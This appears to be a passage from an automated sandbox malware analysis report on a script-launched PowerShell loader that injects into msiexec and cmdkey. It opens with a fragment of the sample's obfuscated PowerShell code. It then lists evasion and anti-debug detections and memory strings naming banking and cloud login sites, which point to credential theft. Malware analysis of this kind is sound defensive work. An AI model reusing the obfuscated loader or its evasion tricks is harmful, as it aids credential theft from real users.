dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dO
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF848A70974 push E95ABDD0h; ret 4_2_00007FF848A709C9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF848B466A3 push es; retf 4_2_00007FF848B466D2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF848B463BD push es; retf 4_2_00007FF848B463EA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF848B4637F push es; retf 4_2_00007FF848B46380
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF848B46473 push es; retf 4_2_00007FF848B464A2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_0490370F pushad ; iretd 6_2_04903749
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_220F09AD push ecx; mov dword ptr [esp], ecx 10_2_220F09B6
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe | Code function: 11_2_0363AB27 push ss; ret 11_2_0363AB28
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe | Code function: 11_2_03636A68 push 0000002Dh; ret 11_2_03636A7A
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe | Code function: 11_2_03631A9D push edx; retf 11_2_03631AA6
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe | Code function: 11_2_03621006 push ecx; ret 11_2_03621007
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe | Code function: 11_2_03624706 push FFFFFF9Ch; ret 11_2_03624708
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe | Code function: 11_2_036296BC push ss; ret 11_2_036296DD
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe | Code function: 11_2_0362345C push ebp; iretd 11_2_0362351F
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe | Code function: 11_2_03630CC3 push eax; ret 11_2_03630CDE
          Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmdkey.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Initial file Initial file: Do While Pfalzgreverne.Status = 0 WScript.Sleep 100
          Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FF8C88ED7E4
          Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FF8C88ED944
          Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FF8C88ED504
          Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FF8C88ED544
          Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_2216D1C0 rdtsc 10_2_2216D1C0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4894
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5036
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6658
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3021
          Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 0.1 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5692 Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6044 Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmdkey.exe Last function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: firefox.exe, 0000000E.00000002.3468210308.000001CF4015E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}_
          Source: msiexec.exe, 0000000A.00000002.3167761730.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3126476457.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,1169642
          Source: powershell.exe, 00000004.00000002.2380674128.0000019E3F373000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1137Z0
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: n PasswordVMware20,11696428655x
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,116X
          Source: msiexec.exe, 0000000A.00000002.3167807046.0000000000A83000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3059746881.0000000000A83000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3059920799.0000000000A83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kers.comVMware20,11696428655}
          Source: cmdkey.exe, 0000000C.00000002.3466952802.000000000316D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: PING.EXE, 00000002.00000002.2193234156.000001A3DB1F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllww
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,1
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20v
          Source: wscript.exe, 00000000.00000002.2199014767.000001B0BE9A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\rEmulo@
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x.intuit.comVMware20,11696428655t
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ist test formVMware20,11696428655
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmdkey.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_2216D1C0 rdtsc 10_2_2216D1C0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_049096D9 LdrInitializeThunk, 6_2_049096D9
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_22127208 mov eax, dword ptr fs:[00000030h] 10_2_22127208
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_220E823B mov eax, dword ptr fs:[00000030h] 10_2_220E823B
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_221C5227 mov eax, dword ptr fs:[00000030h] 10_2_221C5227
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_221AB256 mov eax, dword ptr fs:[00000030h] 10_2_221AB256
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_220E9240 mov eax, dword ptr fs:[00000030h] 10_2_220E9240
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_220F6259 mov eax, dword ptr fs:[00000030h] 10_2_220F6259
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_220EA250 mov eax, dword ptr fs:[00000030h] 10_2_220EA250
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_2212724D mov eax, dword ptr fs:[00000030h] 10_2_2212724D
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_22131270 mov eax, dword ptr fs:[00000030h] 10_2_22131270
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_220E826B mov eax, dword ptr fs:[00000030h] 10_2_220E826B
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_22119274 mov eax, dword ptr fs:[00000030h] 10_2_22119274
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_221A0274 mov eax, dword ptr fs:[00000030h] 10_2_221A0274
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_220F4260 mov eax, dword ptr fs:[00000030h] 10_2_220F4260
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_221BD26B mov eax, dword ptr fs:[00000030h] 10_2_221BD26B
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_2212329E mov eax, dword ptr fs:[00000030h] 10_2_2212329E
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_22170283 mov eax, dword ptr fs:[00000030h] 10_2_22170283
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_2212E284 mov eax, dword ptr fs:[00000030h] 10_2_2212E284
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_221C5283 mov eax, dword ptr fs:[00000030h] 10_2_221C5283
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_221792BC mov eax, dword ptr fs:[00000030h] 10_2_221792BC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221792BC mov eax, dword ptr fs:[00000030h]10_2_221792BC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221792BC mov ecx, dword ptr fs:[00000030h]10_2_221792BC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221792BC mov ecx, dword ptr fs:[00000030h]10_2_221792BC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221002A0 mov eax, dword ptr fs:[00000030h]10_2_221002A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221002A0 mov eax, dword ptr fs:[00000030h]10_2_221002A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221052A0 mov eax, dword ptr fs:[00000030h]10_2_221052A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221052A0 mov eax, dword ptr fs:[00000030h]10_2_221052A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221052A0 mov eax, dword ptr fs:[00000030h]10_2_221052A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221052A0 mov eax, dword ptr fs:[00000030h]10_2_221052A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221872A0 mov eax, dword ptr fs:[00000030h]10_2_221872A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221872A0 mov eax, dword ptr fs:[00000030h]10_2_221872A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221862A0 mov eax, dword ptr fs:[00000030h]10_2_221862A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221862A0 mov ecx, dword ptr fs:[00000030h]10_2_221862A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221862A0 mov eax, dword ptr fs:[00000030h]10_2_221862A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221862A0 mov eax, dword ptr fs:[00000030h]10_2_221862A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221862A0 mov eax, dword ptr fs:[00000030h]10_2_221862A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221862A0 mov eax, dword ptr fs:[00000030h]10_2_221862A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B92A6 mov eax, dword ptr fs:[00000030h]10_2_221B92A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B92A6 mov eax, dword ptr fs:[00000030h]10_2_221B92A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B92A6 mov eax, dword ptr fs:[00000030h]10_2_221B92A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B92A6 mov eax, dword ptr fs:[00000030h]10_2_221B92A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211F2D0 mov eax, dword ptr fs:[00000030h]10_2_2211F2D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211F2D0 mov eax, dword ptr fs:[00000030h]10_2_2211F2D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F92C5 mov eax, dword ptr fs:[00000030h]10_2_220F92C5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F92C5 mov eax, dword ptr fs:[00000030h]10_2_220F92C5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220FA2C3 mov eax, dword ptr fs:[00000030h]10_2_220FA2C3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220FA2C3 mov eax, dword ptr fs:[00000030h]10_2_220FA2C3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220FA2C3 mov eax, dword ptr fs:[00000030h]10_2_220FA2C3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220FA2C3 mov eax, dword ptr fs:[00000030h]10_2_220FA2C3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220FA2C3 mov eax, dword ptr fs:[00000030h]10_2_220FA2C3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211B2C0 mov eax, dword ptr fs:[00000030h]10_2_2211B2C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211B2C0 mov eax, dword ptr fs:[00000030h]10_2_2211B2C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211B2C0 mov eax, dword ptr fs:[00000030h]10_2_2211B2C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211B2C0 mov eax, dword ptr fs:[00000030h]10_2_2211B2C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211B2C0 mov eax, dword ptr fs:[00000030h]10_2_2211B2C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211B2C0 mov eax, dword ptr fs:[00000030h]10_2_2211B2C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211B2C0 mov eax, dword ptr fs:[00000030h]10_2_2211B2C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EB2D3 mov eax, dword ptr fs:[00000030h]10_2_220EB2D3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EB2D3 mov eax, dword ptr fs:[00000030h]10_2_220EB2D3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EB2D3 mov eax, dword ptr fs:[00000030h]10_2_220EB2D3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221AF2F8 mov eax, dword ptr fs:[00000030h]10_2_221AF2F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220E92FF mov eax, dword ptr fs:[00000030h]10_2_220E92FF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221002E1 mov eax, dword ptr fs:[00000030h]10_2_221002E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221002E1 mov eax, dword ptr fs:[00000030h]10_2_221002E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221002E1 mov eax, dword ptr fs:[00000030h]10_2_221002E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A12ED mov eax, dword ptr fs:[00000030h]10_2_221A12ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A12ED mov eax, dword ptr fs:[00000030h]10_2_221A12ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A12ED mov eax, dword ptr fs:[00000030h]10_2_221A12ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A12ED mov eax, dword ptr fs:[00000030h]10_2_221A12ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A12ED mov eax, dword ptr fs:[00000030h]10_2_221A12ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A12ED mov eax, dword ptr fs:[00000030h]10_2_221A12ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A12ED mov eax, dword ptr fs:[00000030h]10_2_221A12ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A12ED mov eax, dword ptr fs:[00000030h]10_2_221A12ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A12ED mov eax, dword ptr fs:[00000030h]10_2_221A12ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A12ED mov eax, dword ptr fs:[00000030h]10_2_221A12ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A12ED mov eax, dword ptr fs:[00000030h]10_2_221A12ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A12ED mov eax, dword ptr fs:[00000030h]10_2_221A12ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A12ED mov eax, dword ptr fs:[00000030h]10_2_221A12ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A12ED mov eax, dword ptr fs:[00000030h]10_2_221A12ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221C52E2 mov eax, dword ptr fs:[00000030h]10_2_221C52E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22110310 mov ecx, dword ptr fs:[00000030h]10_2_22110310
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212A30B mov eax, dword ptr fs:[00000030h]10_2_2212A30B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212A30B mov eax, dword ptr fs:[00000030h]10_2_2212A30B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212A30B mov eax, dword ptr fs:[00000030h]10_2_2212A30B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2217930B mov eax, dword ptr fs:[00000030h]10_2_2217930B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2217930B mov eax, dword ptr fs:[00000030h]10_2_2217930B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2217930B mov eax, dword ptr fs:[00000030h]10_2_2217930B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EC310 mov ecx, dword ptr fs:[00000030h]10_2_220EC310
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B132D mov eax, dword ptr fs:[00000030h]10_2_221B132D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B132D mov eax, dword ptr fs:[00000030h]10_2_221B132D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211F32A mov eax, dword ptr fs:[00000030h]10_2_2211F32A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220E7330 mov eax, dword ptr fs:[00000030h]10_2_220E7330
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220ED34C mov eax, dword ptr fs:[00000030h]10_2_220ED34C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220ED34C mov eax, dword ptr fs:[00000030h]10_2_220ED34C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221BA352 mov eax, dword ptr fs:[00000030h]10_2_221BA352
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2217035C mov eax, dword ptr fs:[00000030h]10_2_2217035C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2217035C mov eax, dword ptr fs:[00000030h]10_2_2217035C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2217035C mov eax, dword ptr fs:[00000030h]10_2_2217035C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2217035C mov ecx, dword ptr fs:[00000030h]10_2_2217035C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2217035C mov eax, dword ptr fs:[00000030h]10_2_2217035C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2217035C mov eax, dword ptr fs:[00000030h]10_2_2217035C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221C5341 mov eax, dword ptr fs:[00000030h]10_2_221C5341
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220E9353 mov eax, dword ptr fs:[00000030h]10_2_220E9353
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220E9353 mov eax, dword ptr fs:[00000030h]10_2_220E9353
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22172349 mov eax, dword ptr fs:[00000030h]10_2_22172349
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22172349 mov eax, dword ptr fs:[00000030h]10_2_22172349
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22172349 mov eax, dword ptr fs:[00000030h]10_2_22172349
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22172349 mov eax, dword ptr fs:[00000030h]10_2_22172349
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22172349 mov eax, dword ptr fs:[00000030h]10_2_22172349
